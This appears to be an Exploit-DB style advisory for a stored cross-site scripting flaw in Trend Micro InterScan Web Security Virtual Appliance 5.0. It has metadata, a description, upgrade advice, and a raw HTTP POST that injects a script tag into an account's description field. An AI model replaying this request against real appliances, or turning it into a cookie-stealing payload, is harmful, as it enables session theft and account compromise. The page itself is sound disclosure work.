Permanent XSS in InterScan Web Security Virtual Appliance 5.0

vendor:

InterScan Web Security Virtual Appliance

by:

Ivan Huertas

8,8

CVSS

HIGH

Cross-site Scripting (XSS)

CWE

Product Name: InterScan Web Security Virtual Appliance

Affected Version From: 5.0

Affected Version To: 5.0

Patch Exists: YES

Related CWE: N/A

CPE: a:trend_micro:interscan_web_security_virtual_appliance:5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Red Hat Nash 5.1

2009

Permanent XSS in InterScan Web Security Virtual Appliance 5.0

A permanent XSS vulnerability exists in InterScan Web Security Virtual Appliance 5.0. An attacker can send a specially crafted HTTP request with malicious JavaScript code to the vulnerable application in order to execute arbitrary code in the context of the user's browser. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Upgrade to the latest version of InterScan Web Security Virtual Appliance.

Source

Exploit-DB raw data:

####################################################################################
# Exploit Title: Permanent XSS in InterScan Web Security Virtual Appliance 5.0
# Author: Ivan Huertas
# Software Link: http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1
# Version: 5.0
# Tested on: Red Hat Nash 5.1
# Code : 
POST /login_account_add_modify.jsp HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8)
Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: xx.xx.xx.xx:1812
Cookie: JSESSIONID=8466E24FDCCB840BDE17D972210DA20E
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&access_rights=reportonly
####################################################################################

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14160.pdf